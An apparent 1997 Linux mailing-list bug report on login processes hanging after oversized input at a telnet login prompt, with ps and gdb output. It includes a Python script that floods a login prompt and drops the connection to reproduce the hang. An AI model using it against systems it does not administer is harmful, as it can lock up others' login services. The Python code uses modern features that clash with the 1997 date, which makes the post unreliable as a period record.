TTY lockups (Kernel V2.0.32)

Karl Vogel (kvo@seagha.com)
Mon, 1 Dec 1997 10:21:04 +0100 (MET)


I've been having a problem with login processes that get stuck. The problem
first appeared on my system when running Kernel V2.0.27. What happened was that
somebody logged in and for some reason entered more than 256 characters at the
login prompt, causing the login process to lock up. (This was mostly caused by
modems connecting without error control and spewing out loads of random data.)
When this happened I could just kill the process or use 'cat </dev/ttypX' to
get the remaining data from the ttyp, after which the login process would
continue and quit.
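
For anyone who wants to script the 'cat </dev/ttypX' workaround, here is a
minimal sketch in Python. It is only an illustration, not something I have run
on the affected box: the names drain_fd and drain_tty are made up for this
example, and unlike cat it opens the device non-blocking, so it returns as soon
as the queued data has been read instead of waiting for end of file.

```python
import os


def drain_fd(fd, chunk_size=4096):
    """Read everything currently queued on a non-blocking descriptor.

    Returns the bytes that were read. Stops at end of file or as soon as
    a read would block (nothing more is queued right now).
    """
    collected = bytearray()
    while True:
        try:
            data = os.read(fd, chunk_size)
        except BlockingIOError:
            break  # no more data queued at the moment
        if not data:
            break  # end of file
        collected += data
    return bytes(collected)


def drain_tty(path):
    """Hypothetical helper: open a tty such as /dev/ttypX and drain it.

    O_NOCTTY keeps the device from becoming our controlling terminal;
    O_NONBLOCK makes the reads return instead of hanging.
    """
    fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK | os.O_NOCTTY)
    try:
        return drain_fd(fd)
    finally:
        os.close(fd)
```

Calling drain_tty('/dev/ttypX') as root, with the real device name filled in,
should have roughly the same effect as the cat command: the pending input is
consumed so the stuck login can carry on.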

Then I noticed kernel V2.0.31 included some reworked tty code by Bill Hawes.
So I installed the latest kernel (V2.0.32) to make sure I was running
up-to-date code.

This partly fixed the problem. Now if I send more than 256 characters to a
login process on a telnetd session, it doesn't lock up anymore. However, I
still notice a locked-up login process every now and then.

Here's some information I collected:

KERNEL: Linux Kernel V2.0.32
RPMS:   /bin/login from package util-linux-2.5-11fix
        /usr/sbin/in.telnetd from package NetKit-B-0.06-12
        libc from package libc-5.3.12-17
        libtermcap from package libtermcap-2.0.8-4

14383 pb S < 0:00 login -h srv004.seagha.com -p
('ps l' indicates it's waiting in write_chan)

----------------------------------
(gdb) bt
#0 0x40020d78 in __write ()
#1 0x40030f5b in _IO_file_write ()
Cannot access memory at address 0x21.
(gdb)
----------------------------------

(gdb) disas
Dump of assembler code for function __write:
0x40020d64 <__write>: pushl %ebp
0x40020d65 <__write+1>: movl %esp,%ebp
0x40020d67 <__write+3>: pushl %ebx
0x40020d68 <__write+4>: movl $0x4,%eax
0x40020d6d <__write+9>: movl 0x8(%ebp),%ebx
0x40020d70 <__write+12>: movl 0xc(%ebp),%ecx
0x40020d73 <__write+15>: movl 0x10(%ebp),%edx
0x40020d76 <__write+18>: int $0x80
0x40020d78 <__write+20>: movl %eax,%edx
0x40020d7a <__write+22>: testl %edx,%edx
0x40020d7c <__write+24>: jnl 0x40020d9a <__write+54>
0x40020d7e <__write+26>: negl %edx
0x40020d80 <__write+28>: pushl %edx
0x40020d81 <__write+29>: call 0x40020d86 <__write+34>
0x40020d86 <__write+34>: popl %ebx
0x40020d87 <__write+35>: addl $0x7ec12,%ebx
0x40020d8d <__write+41>: call 0x4001e3e8 <_init+10344>
0x40020d92 <__write+46>: popl %edx
0x40020d93 <__write+47>: movl %edx,(%eax)
0x40020d95 <__write+49>: movl $0xffffffff,%eax
0x40020d9a <__write+54>: popl %ebx
0x40020d9b <__write+55>: movl %ebp,%esp
0x40020d9d <__write+57>: popl %ebp
0x40020d9e <__write+58>: ret
0x40020d9f <__write+59>: nop
End of assembler dump.
------------

On a kernel < V2.0.31 you can easily simulate this by telnetting into your box,
entering more than 256 characters at the login prompt and then aborting the
connection using ^]. If you now run ps you will see that the login process is
still waiting on the data. Use 'cat </dev/ttypXX' to grab the remaining data;
this will let the login process continue and die.
On a kernel >= V2.0.31 this doesn't work anymore, and I haven't been able to
reproduce the problem manually, which makes it more difficult to correct.
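
The manual test on the older kernels could be scripted along these lines. This
is a rough sketch under several assumptions: the function names are invented
for the example, the filler is plain 'A' characters rather than modem noise,
and the script does not answer the telnet option negotiation the way a real
telnet client does, so in.telnetd may behave differently than it does with an
interactive session. Closing the socket stands in for aborting with ^]. Only
point it at a machine you administer.

```python
import socket

# The post reports lockups once more than 256 characters are entered.
LINE_LIMIT = 256


def build_payload(length=LINE_LIMIT + 64):
    """Return `length` bytes of filler with no newline in it."""
    return b"A" * length


def flood_login_prompt(host, port=23, length=LINE_LIMIT + 64, timeout=5.0):
    """Connect, send the oversized input, then drop the connection.

    Returns the number of bytes sent. Leaving the `with` block closes
    the socket, which is the scripted equivalent of aborting the session.
    """
    payload = build_payload(length)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
    return len(payload)
```

After running flood_login_prompt against the test host, check ps on that host
for a login process that is still hanging around.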

(Note: all these connections run over a telnetd session, even the modem
logins; the Linux box doesn't have modems directly connected to it.)

Karl.

// Electronic Mail - SMTP: kvo@seagha.com
\X/ - X400: c=BE; a=RTT; p=SEAGHA; s=VOGEL; g=KARL